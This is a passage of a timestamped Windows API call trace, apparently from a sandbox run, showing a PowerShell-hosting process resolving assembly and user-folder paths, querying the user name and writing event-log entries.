lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e1e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.855] GetLastError () returned 0xcb [0029.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e1e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.855] GetLastError () returned 0xcb [0029.880] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xb5c60, nSize=0x24e824 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x24e824) returned 0x1 [0029.880] GetLastError () returned 0xcb [0029.880] GetUserNameW (in: lpBuffer=0xd2630, pcbBuffer=0x24e82c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x24e82c) returned 1 [0029.880] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a5531c*="Registry", lpRawData=0x2a551d8) returned 1 [0029.881] GetLastError () returned 0x0 [0029.882] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xb5c60, nSize=0x24e824 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x24e824) returned 0x1 [0029.882] GetLastError () returned 0x0 [0029.882] GetUserNameW (in: lpBuffer=0xd2630, pcbBuffer=0x24e82c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x24e82c) returned 1 [0029.882] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a590d4*="Variable", lpRawData=0x2a58f90) returned 1 [0029.883] GetLastError () returned 0x0 [0029.883] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.883] GetLastError () returned 0xcb [0029.885] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.885] GetLastError () returned 0xcb [0029.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0029.886] GetLastError () returned 0xcb [0029.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0029.886] GetLastError () returned 0xcb [0029.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0029.886] GetLastError () returned 0xcb [0029.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0029.886] GetLastError () returned 0xcb [0029.920] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xb5c60, nSize=0x24e824 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x24e824) returned 0x1 [0029.920] GetLastError () returned 0x3 [0029.920] GetUserNameW (in: lpBuffer=0xd2630, pcbBuffer=0x24e82c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x24e82c) returned 1 [0029.920] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a66e68*="Certificate", lpRawData=0x2a66d24) returned 1 [0029.921] GetLastError () returned 0x0 [0029.928] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.928] GetLastError () returned 0xcb [0029.930] GetLogicalDrives () returned 0x4 [0029.930] GetLastError () returned 0xcb [0029.930] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24e39c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0029.930] GetLastError () returned 0xcb [0029.930] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0029.930] GetLastError () returned 0xcb [0029.931] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0xd2630 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0029.931] GetLastError () returned 0xcb [0029.932] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.932] GetLastError () returned 0xcb [0029.932] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.932] GetLastError () returned 0xcb [0029.938] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.938] GetLastError () returned 0xcb [0029.940] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.940] GetLastError () returned 0xcb [0029.940] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x24e1e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0029.940] GetLastError () returned 0xcb [0029.940] SetErrorMode (uMode=0x1) returned 0x1 [0029.940] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x2a6e6c8 | out: lpFileInformation=0x2a6e6c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x237c2aa0, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x365f3810, ftLastAccessTime.dwHighDateTime=0x1d34346, ftLastWriteTime.dwLowDateTime=0x365f3810, ftLastWriteTime.dwHighDateTime=0x1d34346, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.940] GetLastError () returned 0xcb [0029.940] SetErrorMode (uMode=0x1) returned 0x1 [0029.940] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x24e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0029.940] GetLastError () returned 0xcb [0029.940] SetErrorMode (uMode=0x1) returned 0x1 [0029.940] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x2a6e874 | out: lpFileInformation=0x2a6e874*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x237c2aa0, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x365f3810, ftLastAccessTime.dwHighDateTime=0x1d34346, ftLastWriteTime.dwLowDateTime=0x365f3810, ftLastWriteTime.dwHighDateTime=0x1d34346, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.940] GetLastError () returned 0xcb [0029.941] SetErrorMode (uMode=0x1) returned 0x1 [0029.942] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.942] GetLastError () returned 0xcb [0029.944] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x24e334, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0029.944] GetLastError () returned 0xcb [0029.944] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24e2b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0029.944] GetLastError () returned 0xcb [0029.944] SetErrorMode (uMode=0x1) returned 0x1 [0029.944] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24e730 | out: lpFileInformation=0x24e730*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.944] GetLastError () returned 0xcb [0029.944] SetErrorMode (uMode=0x1) returned 0x1 [0029.945] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24e2b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0029.945] GetLastError () returned 0xcb [0029.945] SetErrorMode (uMode=0x1) returned 0x1 [0029.945] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24e730 | out: lpFileInformation=0x24e730*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.945] GetLastError () returned 0xcb [0029.945] SetErrorMode (uMode=0x1) returned 0x1 [0029.945] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24e2c4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0029.945] GetLastError () returned 0xcb [0029.945] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24e260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0029.945] GetLastError () returned 0xcb [0029.945] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x24e2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0029.945] GetLastError () returned 0xcb [0029.945] SetErrorMode (uMode=0x1) returned 0x1 [0029.945] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x24e730 | out: lpFileInformation=0x24e730*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x233be580, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x233be580, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0029.945] GetLastError () returned 0xcb [0029.945] SetErrorMode (uMode=0x1) returned 0x1 [0029.945] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x24e2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0029.945] GetLastError () returned 0xcb [0029.945] SetErrorMode (uMode=0x1) returned 0x1 [0029.945] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x24e730 | out: lpFileInformation=0x24e730*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x233be580, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x233be580, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0029.945] GetLastError () returned 0xcb [0029.945] SetErrorMode (uMode=0x1) returned 0x1 [0029.945] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x24e2c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0029.945] GetLastError () returned 0xcb [0029.945] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x24e260, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0029.945] GetLastError () returned 0xcb [0029.945] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", nBufferLength=0x105, lpBuffer=0x24e2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0029.945] GetLastError () returned 0xcb [0029.945] SetErrorMode (uMode=0x1) returned 0x1 [0029.945] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR" (normalized: "c:\\users\\bgc6u8oy yxgxkr"), fInfoLevelId=0x0, lpFileInformation=0x24e730 | out: lpFileInformation=0x24e730*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x233be580, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x23db61a0, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x23db61a0, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.945] GetLastError () returned 0xcb [0029.945] SetErrorMode (uMode=0x1) returned 0x1 [0029.945] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", nBufferLength=0x105, lpBuffer=0x24e2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0029.945] GetLastError () returned 0xcb [0029.945] SetErrorMode (uMode=0x1) returned 0x1 [0029.946] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR" (normalized: "c:\\users\\bgc6u8oy yxgxkr"), fInfoLevelId=0x0, lpFileInformation=0x24e730 | out: lpFileInformation=0x24e730*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x233be580, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x23db61a0, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x23db61a0, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.946] GetLastError () returned 0xcb [0029.946] SetErrorMode (uMode=0x1) returned 0x1 [0029.946] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", nBufferLength=0x105, lpBuffer=0x24e2c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0029.946] GetLastError () returned 0xcb [0029.946] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\.", nBufferLength=0x105, lpBuffer=0x24e260, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0029.946] GetLastError () returned 0xcb [0029.946] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x24e2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0029.946] GetLastError () returned 0xcb [0029.946] SetErrorMode (uMode=0x1) returned 0x1 [0029.946] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x24e730 | out: lpFileInformation=0x24e730*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x237c2aa0, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x365f3810, ftLastAccessTime.dwHighDateTime=0x1d34346, ftLastWriteTime.dwLowDateTime=0x365f3810, ftLastWriteTime.dwHighDateTime=0x1d34346, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.946] GetLastError () returned 0xcb [0029.946] SetErrorMode (uMode=0x1) returned 0x1 [0029.946] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x24e2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0029.946] GetLastError () returned 0xcb [0029.946] SetErrorMode (uMode=0x1) returned 0x1 [0029.946] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x24e730 | out: lpFileInformation=0x24e730*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x237c2aa0, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x365f3810, ftLastAccessTime.dwHighDateTime=0x1d34346, ftLastWriteTime.dwLowDateTime=0x365f3810, ftLastWriteTime.dwHighDateTime=0x1d34346, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.946] GetLastError () returned 0xcb [0029.946] SetErrorMode (uMode=0x1) returned 0x1 [0029.946] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x24e2c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0029.946] GetLastError () returned 0xcb [0029.946] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x24e260, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0029.946] GetLastError () returned 0xcb [0029.959] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x24e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0029.959] GetLastError () returned 0xcb [0029.959] SetErrorMode (uMode=0x1) returned 0x1 [0029.959] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x24e73c | out: lpFileInformation=0x24e73c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x233be580, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x233be580, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0029.959] GetLastError () returned 0xcb [0029.959] SetErrorMode (uMode=0x1) returned 0x1 [0029.959] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x24e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0029.959] GetLastError () returned 0xcb [0029.959] SetErrorMode (uMode=0x1) returned 0x1 [0029.959] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x24e73c | out: lpFileInformation=0x24e73c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x233be580, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x233be580, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0029.959] GetLastError () returned 0xcb [0029.959] SetErrorMode (uMode=0x1) returned 0x1 [0029.959] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x24e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0029.959] GetLastError () returned 0xcb [0029.959] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x24e26c, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0029.959] GetLastError () returned 0xcb [0029.960] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", nBufferLength=0x105, lpBuffer=0x24e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0029.960] GetLastError () returned 0xcb [0029.960] SetErrorMode (uMode=0x1) returned 0x1 [0029.960] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR" (normalized: "c:\\users\\bgc6u8oy yxgxkr"), fInfoLevelId=0x0, lpFileInformation=0x24e73c | out: lpFileInformation=0x24e73c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x233be580, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x23db61a0, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x23db61a0, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.960] GetLastError () returned 0xcb [0029.960] SetErrorMode (uMode=0x1) returned 0x1 [0029.960] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", nBufferLength=0x105, lpBuffer=0x24e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0029.960] GetLastError () returned 0xcb [0029.960] SetErrorMode (uMode=0x1) returned 0x1 [0029.960] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR" (normalized: "c:\\users\\bgc6u8oy yxgxkr"), fInfoLevelId=0x0, lpFileInformation=0x24e73c | out: lpFileInformation=0x24e73c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x233be580, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x23db61a0, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x23db61a0, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.960] GetLastError () returned 0xcb [0029.960] SetErrorMode (uMode=0x1) returned 0x1 [0029.960] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", nBufferLength=0x105, lpBuffer=0x24e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0029.960] GetLastError () returned 0xcb [0029.960] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\.", nBufferLength=0x105, lpBuffer=0x24e26c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0029.960] GetLastError () returned 0xcb [0029.960] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x24e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0029.960] GetLastError () returned 0xcb [0029.960] SetErrorMode (uMode=0x1) returned 0x1 [0029.960] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x24e73c | out: lpFileInformation=0x24e73c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x237c2aa0, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x365f3810, ftLastAccessTime.dwHighDateTime=0x1d34346, ftLastWriteTime.dwLowDateTime=0x365f3810, ftLastWriteTime.dwHighDateTime=0x1d34346, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.960] GetLastError () returned 0xcb [0029.960] SetErrorMode (uMode=0x1) returned 0x1 [0029.960] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x24e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0029.960] GetLastError () returned 0xcb [0029.960] SetErrorMode (uMode=0x1) returned 0x1 [0029.960] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x24e73c | out: lpFileInformation=0x24e73c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x237c2aa0, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x365f3810, ftLastAccessTime.dwHighDateTime=0x1d34346, ftLastWriteTime.dwLowDateTime=0x365f3810, ftLastWriteTime.dwHighDateTime=0x1d34346, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.960] GetLastError () returned 0xcb [0029.960] SetErrorMode (uMode=0x1) returned 0x1 [0029.960] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x24e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0029.961] GetLastError () returned 0xcb [0029.961] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x24e26c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0029.961] GetLastError () returned 0xcb [0029.964] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x24e38c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0029.964] GetLastError () returned 0xcb [0029.964] SetErrorMode (uMode=0x1) returned 0x1 [0029.964] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x23377e4 | out: lpFileInformation=0x23377e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x237c2aa0, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x365f3810, 